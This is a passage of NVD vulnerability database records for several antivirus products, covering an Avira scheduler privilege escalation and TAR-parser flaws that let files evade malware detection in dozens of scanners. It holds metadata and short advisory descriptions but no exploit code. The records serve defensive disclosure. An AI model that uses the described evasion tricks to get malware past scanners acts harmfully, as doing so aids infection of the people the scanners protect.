         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36712",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securityreason.com/securityalert/2764",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securitytracker.com/id?1018131",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2009-08-13 16:30
Modified
2024-11-21 01:05
Severity ?
Summary
Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory.
Impacted products



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FDD00670-7EC0-4AA4-98EF-C8AE38330284",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:professional:*:*:*:*:*",
                     matchCriteriaId: "38451FC5-030A-4766-9239-828089FA70D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "60FC2C76-3B5F-418E-A2DD-9F5D2FBE4EF5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_security_suite:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "F805305F-CFA4-4BC9-8C89-885D85B4B8E5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
      },
      {
         lang: "es",
         value: "Vulnerabilidad de búsqueda  de ruta no entrecomillada en Windows en el planificador (sched.exe) en Avira AntiVir, AntiVir Premium, Premium Security Suite y AntiVir Professional, podría permitir a usuarios locales elevar sus privilegios a través de un archivo antivir.exe malicioso en el directorio \"C:\\Program Files\\avira\\\" (\"C:\\Archivos de Programa\\avira\\\").",
      },
   ],
   id: "CVE-2009-2761",
   lastModified: "2024-11-21T01:05:40.430",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.2,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2009-08-13T16:30:01.267",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.osvdb.org/55647",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.osvdb.org/55647",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:36
Severity ?
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador sintáctico de ficheros TAR en Avira AntiVir v7.11.1.163, Antiy Labs AVL SDK v2.0.3.7, Quick Heal (también conocido como Cat QuickHeal) v11.00, Emsisoft Anti-Malware v5.1.0.1, Fortinet Antivirus v4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner v1.1.97.0, Jiangmin Antivirus v13.0.900, Kaspersky Anti-Virus v7.0.0.125, McAfee Anti-Virus Scanning Engine v5.400.0.1158, McAfee Gateway (formalmente Webwasher) v2010.1C, NOD32 Antivirus v5795, Norman Antivirus v6.06.12, PC Tools AntiVirus v7.0.3.5, AVEngine v20101.3.0.103 en Symantec Endpoint Protection v11, Trend Micro AntiVirus v9.120.0.1004, y Trend Micro HouseCall v9.120.0.1004 permite a atacantes remotos evitar la detección de malware a través de un fichero POSIX TAR con la siguiente secuencia de caracteres \\50\\4B\\03\\04.  NOTA: Esto se puede dividir después en varios CVEs si se publicara información mostrando el error que produciría en distintas implementaciones de analizadores sintácticos.",
      },
   ],
   id: "CVE-2012-1425",
   lastModified: "2024-11-21T01:36:57.320",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:47.397",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:37
Severity ?
Summary
The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
cve@mitre.orghttp://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
cve@mitre.orghttp://osvdb.org/80389
cve@mitre.orghttp://osvdb.org/80390
cve@mitre.orghttp://osvdb.org/80391
cve@mitre.orghttp://osvdb.org/80392
cve@mitre.orghttp://osvdb.org/80393
cve@mitre.orghttp://osvdb.org/80395
cve@mitre.orghttp://osvdb.org/80396
cve@mitre.orghttp://osvdb.org/80403
cve@mitre.orghttp://osvdb.org/80406
cve@mitre.orghttp://osvdb.org/80407
cve@mitre.orghttp://osvdb.org/80409
cve@mitre.orghttp://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.orghttp://www.mandriva.com/security/advisories?name=MDVSA-2012:094
cve@mitre.orghttp://www.securityfocus.com/archive/1/522005
cve@mitre.orghttp://www.securityfocus.com/bid/52623
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/74302
af854a3a-2127-422b-91ae-364da2661108http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80389
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80390
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80391
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80392
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80393
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80395
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80396
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80403
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80406
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80407
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80409
af854a3a-2127-422b-91ae-364da2661108http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/52623
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/74302



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B91745E-EA83-4C70-BF2D-45A3678FA157",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                     matchCriteriaId: "803A9A92-A984-43A8-8D27-C9A6FDB19A9D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB884937-53F0-4BB5-AA8F-1CCDCD1221D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                     matchCriteriaId: "D386C31F-6114-4A15-B0D5-15686D7EF8B8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "D95F8C32-D238-493F-A28D-8A588E8ADD13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "0912E21E-1EEB-4ADD-958F-F8AEBBF7C5E6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
